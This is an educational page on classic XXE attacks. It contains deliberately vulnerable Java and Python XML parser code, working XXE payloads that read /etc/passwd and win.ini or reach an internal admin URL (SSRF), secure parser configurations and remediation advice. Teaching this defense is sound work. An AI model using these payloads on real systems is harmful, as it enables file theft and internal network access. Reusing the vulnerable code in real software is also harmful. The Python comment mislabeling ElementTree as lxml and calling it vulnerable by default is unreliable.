Classic XXE (Direct Entity Expansion)
Understanding direct XML external entity attacks where entity content is reflected in the application's response, allowing immediate data exfiltration.
Overview
Classic XXE (also called in-band XXE) occurs when an XML parser processes external entities and includes their content in the application's response. This is the most straightforward form of XXE attack, where the attacker can immediately see the results of the entity expansion.
When exploited successfully, Classic XXE allows attackers to:
- Read arbitrary files from the server's filesystem
- Perform Server-Side Request Forgery (SSRF) attacks
- Cause Denial of Service (DoS)
- In some cases, achieve Remote Code Execution
This vulnerability has a CVSS score of 9.1 (Critical) due to its ease of exploitation and severe impact.
How Classic XXE Works
The attack follows these steps:
- Attacker crafts malicious XML: Creates an XML document with a DOCTYPE declaration containing an external entity definition
- External entity references local resource: The entity points to a file (file:///) or network resource (http://)
- Application parses XML: The vulnerable application processes the XML with an insecurely configured parser
- Parser retrieves content: The XML parser automatically retrieves the referenced resource
- Content reflected in response: The expanded entity content appears in the application's response
- Attacker reads data: The attacker extracts sensitive information from the response
Vulnerable Code Examples
These code examples show how XXE vulnerabilities occur when developers parse XML without proper security configuration:
Vulnerable Java Code
1// VULNERABLE CODE - DO NOT USE IN PRODUCTION
2import javax.xml.parsers.DocumentBuilder;
3import javax.xml.parsers.DocumentBuilderFactory;
4import org.w3c.dom.Document;
5import org.xml.sax.InputSource;
6import java.io.StringReader;
7
8public class VulnerableXmlParser {
9 public Document parseXml(String xmlInput) throws Exception {
10 // Default configuration - VULNERABLE!
11 DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
12 DocumentBuilder builder = factory.newDocumentBuilder();
13
14 // This will process external entities by default
15 Document doc = builder.parse(
16 new InputSource(new StringReader(xmlInput))
17 );
18
19 return doc;
20 }
21}Vulnerable Python Code
1# VULNERABLE CODE - DO NOT USE IN PRODUCTION
2import xml.etree.ElementTree as ET
3
4def parse_xml(xml_string):
5 # Default lxml parsing - VULNERABLE!
6 # External entities are processed by default
7 root = ET.fromstring(xml_string)
8 return root
9
10# Using lxml (also vulnerable by default)
11from lxml import etree
12
13def parse_xml_lxml(xml_string):
14 # VULNERABLE - processes external entities
15 parser = etree.XMLParser()
16 root = etree.fromstring(xml_string, parser)
17 return rootAttack Payload: File Disclosure
This payload demonstrates reading /etc/passwd on Linux systems:
Linux File Disclosure Payload
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3 <!ENTITY xxe SYSTEM "file:///etc/passwd">
4]>
5<root>
6 <data>&xxe;</data>
7</root>Windows File Disclosure Payload
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3 <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">
4]>
5<root>
6 <data>&xxe;</data>
7</root>SSRF Attack Payload
This payload makes the server send a request to an internal network resource:
SSRF Payload Example
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE foo [
3 <!ENTITY xxe SYSTEM "http://internal-server:8080/admin">
4]>
5<root>
6 <data>&xxe;</data>
7</root>Expected Response
When the attack succeeds, the application's response will contain the file contents or internal server response:
Vulnerable Response Example
1<root>
2 <data>
3root:x:0:0:root:/root:/bin/bash
4daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5bin:x:2:2:bin:/bin:/usr/sbin/nologin
6sys:x:3:3:sys:/dev:/usr/sbin/nologin
7...
8 </data>
9</root>Secure Configuration
To prevent XXE attacks, you must explicitly disable external entity processing and DTD processing:
Secure Java Configuration
1// SECURE CODE
2import javax.xml.parsers.DocumentBuilder;
3import javax.xml.parsers.DocumentBuilderFactory;
4import org.w3c.dom.Document;
5import org.xml.sax.InputSource;
6import java.io.StringReader;
7
8public class SecureXmlParser {
9 public Document parseXml(String xmlInput) throws Exception {
10 DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
11
12 // Disable DOCTYPE declarations entirely (most secure)
13 factory.setFeature(
14 "http://apache.org/xml/features/disallow-doctype-decl",
15 true
16 );
17
18 // If you can't disable DOCTYPE, disable external entities
19 factory.setFeature(
20 "http://xml.org/sax/features/external-general-entities",
21 false
22 );
23 factory.setFeature(
24 "http://xml.org/sax/features/external-parameter-entities",
25 false
26 );
27
28 // Disable external DTDs
29 factory.setFeature(
30 "http://apache.org/xml/features/nonvalidating/load-external-dtd",
31 false
32 );
33
34 // Disable XInclude
35 factory.setXIncludeAware(false);
36
37 // Disable expanding entity references
38 factory.setExpandEntityReferences(false);
39
40 DocumentBuilder builder = factory.newDocumentBuilder();
41 Document doc = builder.parse(
42 new InputSource(new StringReader(xmlInput))
43 );
44
45 return doc;
46 }
47}Secure Python Configuration
1# SECURE CODE
2from lxml import etree
3from defusedxml import ElementTree as DefusedET
4
5# Option 1: Use defusedxml (recommended)
6def parse_xml_safe(xml_string):
7 # defusedxml automatically disables dangerous features
8 root = DefusedET.fromstring(xml_string)
9 return root
10
11# Option 2: Configure lxml securely
12def parse_xml_lxml_safe(xml_string):
13 # Create parser with disabled entity resolution
14 parser = etree.XMLParser(
15 resolve_entities=False,
16 no_network=True,
17 dtd_validation=False,
18 load_dtd=False
19 )
20 root = etree.fromstring(xml_string, parser)
21 return rootImpact and Risk
Classic XXE vulnerabilities have severe security implications:
Confidentiality Impact: HIGH
- Access to sensitive files (/etc/passwd, /etc/shadow, application config files)
- Database credentials and API keys
- Source code and intellectual property
- User data and PII
Integrity Impact: LOW-MEDIUM
- Usually limited to data exfiltration
- Can lead to SSRF attacks that modify internal state
Availability Impact: MEDIUM-HIGH
- Billion Laughs attack can cause DoS
- Resource exhaustion from large file reads
- System crashes from parsing malformed data
Real-World Examples:
- Reading cloud metadata endpoints (AWS, Azure, GCP)
- Accessing internal admin panels
- Exfiltrating database backups
- Reading application source code
Detection and Testing
To test for Classic XXE vulnerabilities:
- Identify XML input points: API endpoints, file uploads, SOAP services
- Test with basic payload: Submit XML with external entity referencing a known file
- Observe response: Check if file contents appear in the response
- Test SSRF: Try referencing an attacker-controlled server to confirm outbound requests
- Automated scanning: Use Burp Suite, OWASP ZAP, or custom scripts
Key indicators of vulnerability:
- Application accepts XML input
- Response contains expanded entity content
- Application makes outbound requests to attacker-controlled servers
- Error messages reveal file paths or entity processing
Remediation Summary
Priority 1 (Critical): Disable DOCTYPE declarations entirely Priority 2 (High): Disable external entity processing Priority 3 (High): Disable DTD processing Priority 4 (Medium): Implement input validation and allowlisting Priority 5 (Medium): Use secure XML parsing libraries (e.g., defusedxml) Priority 6 (Low): Implement WAF rules to detect XXE patterns
Refer to language-specific prevention guides for detailed implementation instructions.